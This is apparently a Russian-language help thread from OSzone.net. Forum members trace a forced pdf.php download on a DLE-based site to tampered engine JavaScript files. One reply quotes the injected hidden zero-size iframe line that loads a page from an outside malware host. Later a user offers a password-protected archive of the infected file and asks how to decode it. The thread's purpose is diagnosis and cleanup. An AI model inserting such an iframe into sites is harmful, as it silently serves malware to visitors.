![]() |
помогите отыскать вирус
При заходе на сайт ripbox_ru (вернее при первом заходе) если сменить IP то выскочит снова
выскакивает в менеджере загрузок файл и просится счкачать - _http://herewereytinj.com/tera/sv777/pdf.php после скачивания получается файл типа s85LQp3BqohkWX8OXrI2d.pdf (каждый раз другой выходит) как я понял это разновидность pdf.php вируса я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил проверка тут http://sitedrill.ru/ripbox.ru показывает что сайт чистый но всё таки после каждого смена айпи адреса вылазит этот файл на закачку куда могли спрятать вирус? как определить? |
скрытую загрузку можно по-разному сделать, в т.ч. через редирект...
Цитата:
тема перенесена из раздела "Вебмастеру" |
AACC, здравствуйте. Выполните рекомендации и прикрепите к следующему сообщению полученные логи.
|
Sham, тот админ к этим загрузкам не причем... он сам попросил меня чтоб я гдето спросил
sanek_freeman, мне не мой компьютор лечить нужно, а тот сайт |
Цитата:
|
вверху, где баннер, каким-то скриптом суется iframe
HTML код:
<iframe width="0" height="0" src="http://herewereytinj.com/tera/sv777/index.php"></iframe> Рекламные скрипты размещает админ, значит, пусть проверяет все скрипты рекламодателей. |
спасибо всем за помощь
сайт от вирусов отчистился... вирус скрывался в JS файлах в данном случаи они скрывались в папке \engine\ajax menu.js js_edit.js dle_ajax.js админ перелил на оригенальные файлы и вирус исчез вопрос как можно было их изменить так чтоб дата редактирования не изменилась? п.с. кстати есть для примера 1 файл с вирусом если хотите могу показать я его проверил касперским и там оказался вирус |
Сейчас скрытый фрейм как и был, никуда не исчез, но src редиректит на 404 (удален из удаленного хоста).
|
Sham, каким способом ты видишь скрытый фрейм?
|
FF + noscript (вверху слева квадратик - типа заблокирован фрейм), или через DOM (например, FF + firebug).
Теперь исчез вроде :), видимо у меня в кэше завалялось... |
Sham, можешь сделать скриншот в каком месте ты его видел?
|
Цитата:
Я так думаю, что движок того сайта занулен, и скачан незнамо откуда, со скриптами, уже содержащими левый код. Рынок таких загрузок (вирусов и зловредов) существует, и тот кто убирает защиту у платных CMS/форумов, таким образом может захотеть подзаработать... |
Вложений: 1
вот оказывается в каком файле был спрятан вредоносный код
пароль на архив - virus я сканировал его разными утилитами... только Kaspersky Virus Removal Tool нашел в нем злой код п.с. кто занет как можно расшифровать код в том JS файле |
запустите код в HTML-файле - увидите код iframe (код обезопасен заменой тегов)
HTML код:
<script language="javascript" type="text/javascript"> |
Время: 02:52. |
Время: 02:52.
© OSzone.net 2001-